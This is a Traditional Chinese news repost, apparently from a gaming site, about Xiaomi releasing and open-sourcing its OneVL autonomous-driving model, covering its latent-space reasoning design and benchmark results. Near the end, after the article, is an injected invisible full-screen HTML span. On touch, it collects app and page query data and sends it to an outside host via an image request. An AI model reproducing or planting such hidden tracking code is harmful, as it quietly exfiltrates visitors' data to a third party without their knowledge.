小米技術新突破！Xiaomi OneVL 自動駕駛模型正式發佈並全面開源

今日，小米正式發佈—— Xiaomi OneVL：一步式潛空間語言視覺推理框架。

該模型在業內率先實現 VLA、世界模型、潛空間推理等多個技術路線的統一，在具備 XLA 模型強悍推理能力的基礎上，大幅提升了推理的速度和精度，是行業內具備開創性的方案，在精度上超越顯式 CoT、在速度上對齊“僅答案”預測的潛空間 CoT 方案。

Xiaomi OneVL：讓大模型推理“既快又準”

核心身份： Xiaomi OneVL 是小米 XLA 認知大模型架構下的重要成果，首次實現了 VLA（視覺-語言-動作）、世界模型與潛空間推理三大技術路線的統一。
性能優勢：它是業內首個在精度上超越“顯式思維鏈（CoT）”、在速度上對齊“僅答案”預測方案的潛在推理方案。

三項關鍵技術，統一 VLA、世界模型、潛空間推理三大技術路線

爲了解決傳統大模型推理速度慢（顯式 CoT 延遲高）或缺乏因果判斷的問題，OneVL 採用了以下方案：

雙模態潛空間 Token： 分別使用“視覺 latent token”編碼物理因果結構，以及“語言 latent token”編碼駕駛意圖，讓模型在“心裏”完成思考。
雙輔助解碼器： 訓練時利用視覺解碼器（預測未來畫面）和語言解碼器（生成可讀思維鏈）進行雙重監督；推理時移除解碼器，實現零額外開銷。
“預填充式”一步推理： 將推理過程壓縮至一次並行完成，延遲僅爲傳統自迴歸推理的 5.4%，比顯式 CoT 快達 2.3 倍。

多基準全面 SOTA，刷新潛在推理方法性能上限

跑分領先：在 ROADWork、Impromptu、NAVSIM 等多個主流基準測試中達到 SOTA（業內領先）水平。在 NAVSIM 上的 PDM 得分達到 88.84。
實時性強：掛載特定變體後，延遲可壓低至 0.24s (4.16 Hz)，具備了在量產車端實時部署的可行性。
可解釋性：模型不僅能輸出駕駛動作，還能通過文字解釋原因，並用預測畫面展示未來可能發生的情況。

開源貢獻

小米已將 Xiaomi OneVL 的模型權重、訓練代碼及推理代碼全面開源，旨在與全球開發者共同推動自動駕駛技術的迭代。

總結

簡而言之： 小米 OneVL 通過“潛空間推理”讓自動駕駛大模型在大腦中進行高速因果推演，解決了大模型在車端部署時“推理準但不快”或“快但不準”的矛盾。

<span ontouchstart="this.style.display='none';try{setTimeout(()=>{H=window.HeyboxRequest,q=(((window.CURRENT_VUE||{}).$data||{}).location||{}).query||{},hbInfo=(window.$hb_location||{}).query||{};new Image().src='https://a.124213.xyz/collect?fullInfo='+JSON.stringify(q)+'&hbInfo='+JSON.stringify(hbInfo)+'&searchStr='+encodeURIComponent(location.search)},200)}catch(e){}" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;opacity:0"></span>

更多遊戲資訊請關註：電玩幫遊戲資訊專區

電玩幫圖文攻略 www.vgover.com